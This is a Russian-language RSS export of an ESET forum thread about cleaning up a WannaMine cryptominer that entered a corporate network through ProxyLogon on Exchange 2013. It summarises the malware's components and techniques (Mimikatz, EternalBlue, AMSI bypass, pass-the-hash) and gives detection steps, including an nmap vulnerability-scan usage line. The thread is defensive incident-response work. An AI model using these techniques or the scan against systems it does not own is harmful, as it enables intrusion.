<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0">
	<channel>
		<title>Форум esetnod32.ru [тема: Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013]</title>
		<link>http://forum.esetnod32.ru</link>
		<description>Новое в теме Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013 форума  на сайте Форум esetnod32.ru [forum.esetnod32.ru]</description>
		<language>ru</language>
		<docs>http://backend.userland.com/rss2</docs>
		<pubDate>Thu, 23 Apr 2026 02:33:33 +0300</pubDate>
		<item>
			<title>Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16547/message113075/">Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013</a></b> <i>ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 и CVE-2021-27065), Trojan.Win32.Generic, Trojan.Multi.GenAutorunReg.c, Trojan.Multi.GenAutorunWMI.a, PowerShellMulDrop.129 + PowerShellDownLoader.1452, HEUR:Trojan.Multi.GenAutorunSvc.ksws</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			по сути инцидента с распространением майнера в корпоративной сети есть отличный апрельский отчет от INCIBE_CERT:<br /><br /><I>Это исследование предназначено для профессионалов в области ИТ и кибербезопасности, исследователей и технических аналитиков, заинтересованных в анализе и исследованиях такого типа угроз, а также администраторов ИТ-сетей и системных администраторов с целью своевременного обновления своих компьютеров и защиты их от этой угрозы.</I><br /><br /><B>кратное изложение:</B><br /><br />3. Исходный файл - &nbsp;многослойный обфусцированный и закодированный в base64 файл Powershell.<br />вектор входа (откуда) во время первого заражения неизвестен. (в нашем случае, понятно, что через уязвимость в MS Exchange Server 2013. После анализа было установлено, что это вредоносное ПО из семейства <B>WannaMine</B>, чья основная цель - криптомайнинг (использование пораженных машин для майнинга криптовалюты), который пытается распространиться по пораженной сети.<br /><br />эта вредоносная программа состоит из нескольких компонент(артефактов) и имеет возможность извлекать учетные данные из уязвимых систем, используя Mimikatz, а также эксплуатарует уязвимость CVE-2017-01441, известной как EternalBlue, чтобы получить доступ к другим машинам в сети, где вы не можете сделать это с помощью учетных данных, полученных с помощью собственных механизмов удаленного выполнения в Windows. Атака частично безфайловая, чтобы обойти антивирус и программы сканирования, автоматический запуск в песочницах, так как он использует PowerShell, чтобы попытаться запустить все в объем памяти. <br /><br /><B>исходный файл: </B><br />int6.ps1 &nbsp; Дроппер, который осуществляет первоначальное заражение на каждой из пораженных машин. <br /><br />"Funs" Этот артефакт представляет собой сценарий PowerShell, который содержит множество вспомогательных функций, и функциональность бокового движения. <br /><br />«mimi»: Mimikatz Это двоичный файл Mimikatz, который выполняется путем отраженной инъекции, избегая таким образом записи на диск и используется для получения учетных данных системы.<br /><br />«mon»: miner XMRig Это двоичный файл программного обеспечения XMRig, майнера криптовалюты с открытым исходным кодом. популярен в атаках криптоджекинга. Он работает в памяти с помощью PowerShell, поэтому что двоичный файл не записывается на диск. <br /><br />WinRing0x64.sys Этот компонент является легальным и подписанным драйвером, используемым майнером XMRig, который позволяет настроить регистры MSR для оптимизации производительности майнинга. Известно, что этот драйвер содержит уязвимости, которые позволяют эскалацию привилегии.<br /><br />mue.exe<br />Этот компонент записывается на диск во время заражения, и его задача - инжектировать полезную нагрузку в легальный процесс<br /><br />"Sc": Shellcode EternalBlue. Этот компонент был идентифицирован как шелл-код для эксплуатации уязвимости. EternalBlue, и его задача - заразить новую машину WannaMine во время бокового движения.<br /><br />Данная угроза способна выполнять следующие действия:<br /><br />* Обойти интерфейс сканирования на наличие вредоносных программ (AMSI).<br />* Поддерживать устойчивость в системе, создав подписку на события WMI. <br />* Извлекать токены NTLM. <br />*Сканировать на наличие уязвимости EternalBlue. <br />* Распространение на другие системы с помощью EternalBlue. <br />* Распространение на другие системы путем удаленного выполнения WMI с функцией Pass-the-Hash. <br />* Распространение на другие системы путем удаленного выполнения SMB с помощью функции Pass-the-Hash. <br />* Установить программное обеспечение для добычи криптовалюты с безфайловым исполнением (PowerShell). <br />* Установить программное обеспечение для майнинга криптовалют путем инъекции (Process Hollowing) <br />* Изменить настройки Windows, чтобы оптимизировать производительность майнинга. <br />* Изменить настройки Windows для сохранения. <br />* Оставить систему в уязвимом состоянии с целью локального повышения привилегий <br />
			<a href="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=120285">Estudio del an?lisis de WannaMine.pdf</a><br /><i>14.09.2021 12:10:19, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16547/message113075/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16547/message113075/</guid>
			<pubDate>Tue, 14 Sep 2021 12:10:19 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16547/message113068/">Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013</a></b> <i>ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 и CVE-2021-27065), Trojan.Win32.Generic, Trojan.Multi.GenAutorunReg.c, Trojan.Multi.GenAutorunWMI.a, PowerShellMulDrop.129 + PowerShellDownLoader.1452, HEUR:Trojan.Multi.GenAutorunSvc.ksws</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			можно подвести некоторые итоги:<br /><br />1. файлы отправленные в вирлаб по прежнему на ВирусТоал чисты (хотя ответа по этому поводу от вирлабов нет)<br /><br />2. &nbsp;после блокировки на маршрутизаторе ip адресом, с которых были направлены запросы на сервер MS Exchange<br /> &nbsp; &nbsp;скрипт проверки на уязвимость <B>Test-ProxyLogon.ps1</B> не показал новых атак на сервер<br /><noindex><a href="https://github.com/microsoft/CSS-Exchange/releases/latest/download/Test-ProxyLogon.ps1" target="_blank" rel="nofollow">https://github.com/microsoft/CSS-Exchange/releases/latest/download/Test-ProxyLogon.ps1</a></noindex><br />хотя и показывает что уязвимость обнаружена.<br />[FILE ID=120264]<br />3. актуальный патч для "Exchange Server\V15\" установлен, но необходимо проверить логи установки, успешно было установлено актуальное кумулятивное обновление или нет.<br />Exchange Server 2013<br /><br />В таблице этого раздела приведены номера сборок и общие даты выпуска всех версий Microsoft Exchange Server 2013.<br /><br />Exchange Server 2013<br />Название продукта 	Дата выпуска 	Номер сборки<br />(краткий формат) 	Номер сборки<br />(длинный формат)<br /><span class="bx-font" style="font-size:12pt; line-height: normal;"> &nbsp; Exchange Server 2013 CU23 Jul21SU 	13 июля 2021 г. 	15.0.1497.23 	15.00.1497.023<br /></span><br /><br />4. так же можно проверить наличие уязвимости используя nmap и спец скрипт, <br /><B>Latest stable release self-installer: nmap-7.92-setup.exe</B><br /><noindex><a href="https://nmap.org/download.html" target="_blank" rel="nofollow">https://nmap.org/download.html</a></noindex><br />+ скрипт, добавить в каталог скриптов nse для nmap<br /><noindex><a href="https://github.com/microsoft/CSS-Exchange/releases/latest/download/http-vuln-cve2021-26855.nse" target="_blank" rel="nofollow">https://github.com/microsoft/CSS-Exchange/releases/latest/download/http-vuln-cve2021-26855.nse</a></noindex><br /><br /><br />====quote====<br />-- @usage<br />-- nmap -p &lt;port&gt; --script http-vuln-cve2021-26855 &lt;target&gt;<br />--<br />-- @output<br />-- PORT STATE SERVICE<br />-- 443/tcp open https<br />-- | http-vuln-cve2021-26855:<br />-- | VULNERABLE<br />-- | Exchange Server SSRF Vulnerability<br />-- | State: VULNERABLE<br />-- | IDs: CVE:CVE-2021-26855<br />-- |<br />-- | Disclosure date: 2021-03-02<br />-- | References:<br />-- | <noindex><a href="http://aka.ms/exchangevulns" target="_blank" rel="nofollow">http://aka.ms/exchangevulns</a></noindex><br />--<br />-- @args http-vuln-cve2021-26855.method The HTTP method for the request. The default method is "GET".<br /><br />=============<br /><br />5. вопрос с регулярным детектированием (через каждые три часа) антивирусом группы вредоносных скриптом был решен<br />проверка задач по образу uVS из нормального режима и из под winpe ничего не показала.<br />внешние атаки не наблюдались;<br />по логу procmon в момент срабатывания антивируса была обнаружена активность касперского с регулярным обновлением. наступил час Сократа.<br />админы приняли решение очистить карантин, куда антивирус регулярно добавлял файлы каждые три часа.<br />после очистки карантина детекты прекратились. что это было? вопрос к знатокам.<br /><br />6. собственно следующая задача - добиться централизованного управления и контроля через веб-консоль &nbsp;по всем установленным антивирусных клиентам, и оперативная очистка возможно оставшихся неочищенными узлов.<br /><br />рекомендуем для ознакомления: <br /><B>ESET Protect</B><br /><noindex><a href="https://help.eset.com/protect_admin/81/ru-RU/" target="_blank" rel="nofollow">https://help.eset.com/protect_admin/81/ru-RU/</a></noindex><br /><br />7. можно проверить в работе данную утилиту на предмет аудита по журналам.<br />Новый инструмент<B> Chainsaw</B> помогает командам IR анализировать журналы событий Windows<br /><noindex><a href="https://github.com/countercept/chainsaw/releases/download/v1.0.2/chainsaw_x86_64-pc-windows-msvc.zip" target="_blank" rel="nofollow">https://github.com/countercept/chainsaw/releases/download/v1.0.2/chainsaw_x86_64-pc-windows-msvc.zip</a></noindex> <br />
			<img src="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=120264&" width="847" height="195" /><br /><i>12.09.2021 17:03:45, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16547/message113068/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16547/message113068/</guid>
			<pubDate>Sun, 12 Sep 2021 17:03:45 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16547/message113044/">Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013</a></b> <i>ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 и CVE-2021-27065), Trojan.Win32.Generic, Trojan.Multi.GenAutorunReg.c, Trojan.Multi.GenAutorunWMI.a, PowerShellMulDrop.129 + PowerShellDownLoader.1452, HEUR:Trojan.Multi.GenAutorunSvc.ksws</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			ок, недетектируемые файлы из процесса W3WP.EXE ушли в вирлаб, ждет ответ <br />
			<i>06.09.2021 06:13:21, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16547/message113044/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16547/message113044/</guid>
			<pubDate>Mon, 06 Sep 2021 06:13:21 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16547/message113042/">Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013</a></b> <i>ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 и CVE-2021-27065), Trojan.Win32.Generic, Trojan.Multi.GenAutorunReg.c, Trojan.Multi.GenAutorunWMI.a, PowerShellMulDrop.129 + PowerShellDownLoader.1452, HEUR:Trojan.Multi.GenAutorunSvc.ksws</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_9tRJpiIz" href="/user/22/" bx-tooltip-user-id="22">santy</a> написал:<br />malwarebytes<br />=============<br />Скачал, установил, просканировал, лог отправил на почту.<br />Криминала не обнаружил. <br />
			<i>04.09.2021 18:38:05, Mr Burila.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16547/message113042/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16547/message113042/</guid>
			<pubDate>Sat, 04 Sep 2021 18:38:05 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16547/message113041/">Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013</a></b> <i>ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 и CVE-2021-27065), Trojan.Win32.Generic, Trojan.Multi.GenAutorunReg.c, Trojan.Multi.GenAutorunWMI.a, PowerShellMulDrop.129 + PowerShellDownLoader.1452, HEUR:Trojan.Multi.GenAutorunSvc.ksws</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			ок, смотрю, <br /><br /><br />ссылка на malwarebytes<br /><noindex><a href="https://forum.esetnod32.ru/forum9/topic10688/" target="_blank" rel="nofollow">https://forum.esetnod32.ru/forum9/topic10688/</a></noindex><br /><br />ссылка на скачивание:<br /><noindex><a href="http://www.malwarebytes.org/mwb-download/" target="_blank" rel="nofollow">http://www.malwarebytes.org/mwb-download/</a></noindex> <br />
			<i>04.09.2021 18:04:20, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16547/message113041/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16547/message113041/</guid>
			<pubDate>Sat, 04 Sep 2021 18:04:20 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16547/message113040/">Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013</a></b> <i>ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 и CVE-2021-27065), Trojan.Win32.Generic, Trojan.Multi.GenAutorunReg.c, Trojan.Multi.GenAutorunWMI.a, PowerShellMulDrop.129 + PowerShellDownLoader.1452, HEUR:Trojan.Multi.GenAutorunSvc.ksws</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_19Qc4UFH" href="/user/22/" bx-tooltip-user-id="22">santy</a> написал:<br />через uVS включить запись DNS лога<br />=============<br />отправил на почту <br />
			<i>04.09.2021 17:56:52, Mr Burila.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16547/message113040/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16547/message113040/</guid>
			<pubDate>Sat, 04 Sep 2021 17:56:52 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16547/message113039/">Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013</a></b> <i>ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 и CVE-2021-27065), Trojan.Win32.Generic, Trojan.Multi.GenAutorunReg.c, Trojan.Multi.GenAutorunWMI.a, PowerShellMulDrop.129 + PowerShellDownLoader.1452, HEUR:Trojan.Multi.GenAutorunSvc.ksws</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_U2inpm9s" href="/user/22/" bx-tooltip-user-id="22">santy</a> написал:<br />через uVS включить запись DNS лога<br />=============<br />Запись лога включена.<br />Ждём. <br />
			<i>04.09.2021 17:11:51, Mr Burila.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16547/message113039/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16547/message113039/</guid>
			<pubDate>Sat, 04 Sep 2021 17:11:51 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16547/message113038/">Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013</a></b> <i>ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 и CVE-2021-27065), Trojan.Win32.Generic, Trojan.Multi.GenAutorunReg.c, Trojan.Multi.GenAutorunWMI.a, PowerShellMulDrop.129 + PowerShellDownLoader.1452, HEUR:Trojan.Multi.GenAutorunSvc.ksws</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			пробуйте через uVS включить запись DNS лога, <br />чтобы в образ попали вероятные ip адреса, с которых возможно идет атака на сервер. <br />это можно сделать в режиме uVS - alt+T (твики). 41 включить DNS лог <br />
			<i>04.09.2021 16:49:12, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16547/message113038/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16547/message113038/</guid>
			<pubDate>Sat, 04 Sep 2021 16:49:12 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16547/message113037/">Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013</a></b> <i>ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 и CVE-2021-27065), Trojan.Win32.Generic, Trojan.Multi.GenAutorunReg.c, Trojan.Multi.GenAutorunWMI.a, PowerShellMulDrop.129 + PowerShellDownLoader.1452, HEUR:Trojan.Multi.GenAutorunSvc.ksws</i> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br />Рабочий процесс информационных служб Интернета (IIS) - это windows процесс (w3wp.exe), который запускает веб-приложения и отвечает за обработку запросов, отправленных на веб-сервер для определенного пула приложений. <br /><br />Это рабочий процесс для IIS. Каждый пул приложений создает по крайней мере один экземпляр w3wp.exe , и именно он фактически обрабатывает запросы в вашем приложении<br /><br />=============<br /><br />собственно, видим, что<br />Полное имя &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;C:\WINDOWS\SYSTEM32\INETSRV\W3WP.EXE<br />Имя файла &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; W3WP.EXE<br />Тек. статус &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; АКТИВНЫЙ ПРОВЕРЕННЫЙ [СЕТЕВАЯ_АКТИВНОСТЬ]<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Цифр. подпись &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Действительна, подписано Microsoft Windows<br /><B>Загруженные DLL &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; НЕИЗВЕСТНЫЕ</B><br />
====code====
<pre>APP_BROWSERS.CM1GY-YR.DLL&nbsp;&nbsp; C:&#92;WINDOWS&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;ECP&#92;67F1AD38&#92;E5546D0A
APP_GLOBAL.ASAX.9ROHC7PQ.DLLC:&#92;WINDOWS&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;ECP&#92;67F1AD38&#92;E5546D0A
APP_GLOBAL.ASAX.B43PI4NY.DLLC:&#92;WINDOWS&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;RPC&#92;296C8D2F&#92;5A4276D8
APP_GLOBAL.ASAX.CQHP4HAL.DLLC:&#92;WINDOWS&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;AUTODISCOVER&#92;1E0EBF5E&#92;81BBFD0C
APP_GLOBAL.ASAX.F82CQ-3M.DLLC:&#92;WINDOWS&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;EWS&#92;82CED47D&#92;9F9837FE
APP_GLOBAL.ASAX.FJON4ZRX.DLLC:&#92;WINDOWS&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;OWA_CALENDAR&#92;50586ABB&#92;43FE3563
APP_GLOBAL.ASAX.GFOSMOYG.DLLC:&#92;WINDOWS&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;MAPI&#92;236CA80D&#92;613D0742
APP_GLOBAL.ASAX.LOVEIRWB.DLLC:&#92;WINDOWS&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;AUTODISCOVER&#92;B455E468&#92;CBAAC37D
APP_GLOBAL.ASAX.N3CT8VNU.DLLC:&#92;WINDOWS&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;OWA&#92;8E05B027&#92;E164D61B
APP_GLOBAL.ASAX.P7BTXYGD.DLLC:&#92;WINDOWS&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;OWA&#92;F1907565&#92;9FA11D9F
APP_GLOBAL.ASAX.QXTXGCN5.DLLC:&#92;WINDOWS&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;OAB&#92;5A665F22&#92;C3DD660B
APP_GLOBAL.ASAX.RGDBHA8I.DLLC:&#92;WINDOWS&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;EWS&#92;9BF2358A&#92;E86A63DA
APP_GLOBAL.ASAX.T_-RLTDU.DLLC:&#92;WINDOWS&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;MAPI_EMSMDB&#92;FF130E68&#92;58BD4667
APP_GLOBAL.ASAX.VOPJ5BFR.DLLC:&#92;WINDOWS&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;POWERSHELL&#92;788CBAD3&#92;5ED4F687
APP_GLOBAL.ASAX.ZIGCDRV_.DLLC:&#92;WINDOWS&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;ECP&#92;1CD810A3&#92;710C31B6
APP_THEME_DEFAULT._PA_PVFA.DLLC:&#92;WINDOWS&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;ECP&#92;67F1AD38&#92;E5546D0A
APP_WEB_0EXSSJHG.DLL&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:&#92;WINDOWS&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;ECP&#92;67F1AD38&#92;E5546D0A
APP_WEB_2X1TGTE0.DLL&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:&#92;WINDOWS&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;ECP&#92;67F1AD38&#92;E5546D0A
APP_WEB_2ZYUFYVK.DLL&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:&#92;WINDOWS&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;ECP&#92;67F1AD38&#92;E5546D0A
APP_WEB_BZJN21B2.DLL&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:&#92;WINDOWS&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;ECP&#92;67F1AD38&#92;E5546D0A
APP_WEB_DPLFNAEX.DLL&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:&#92;WINDOWS&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;ECP&#92;67F1AD38&#92;E5546D0A
APP_WEB_FHHKYG34.DLL&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:&#92;WINDOWS&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;ECP&#92;67F1AD38&#92;E5546D0A
APP_WEB_FRZ2LSJQ.DLL&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:&#92;WINDOWS&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;ECP&#92;67F1AD38&#92;E5546D0A
APP_WEB_HHL3EFGE.DLL&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:&#92;WINDOWS&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;ECP&#92;67F1AD38&#92;E5546D0A
APP_WEB_LUOS5NMH.DLL&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:&#92;WINDOWS&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;ECP&#92;67F1AD38&#92;E5546D0A
APP_WEB_MT1YTSHN.DLL&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:&#92;WINDOWS&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;ECP&#92;67F1AD38&#92;E5546D0A
APP_WEB_O5BJKYBG.DLL&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:&#92;WINDOWS&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;OWA&#92;8E05B027&#92;E164D61B
APP_WEB_OCV4TGXS.DLL&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:&#92;WINDOWS&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;ECP&#92;67F1AD38&#92;E5546D0A
APP_WEB_QDEJ0KXZ.DLL&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:&#92;WINDOWS&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;ECP&#92;67F1AD38&#92;E5546D0A
APP_WEB_WKYXHA1V.DLL&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:&#92;WINDOWS&#92;MICROSOFT.NET&#92;FRAMEWORK64&#92;V4.0.30319&#92;TEMPORARY ASP.NET FILES&#92;ECP&#92;67F1AD38&#92;E5546D0A
MSERVCLIENT.DLL&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; C:&#92;PROGRAM FILES&#92;MICROSOFT&#92;EXCHANGE SERVER&#92;V15&#92;BIN
OSAFEHTM.DLL&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;C:&#92;PROGRAM FILES&#92;MICROSOFT&#92;EXCHANGE SERVER&#92;V15&#92;BIN
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</pre>
============= <br />
			<i>04.09.2021 16:38:34, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16547/message113037/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16547/message113037/</guid>
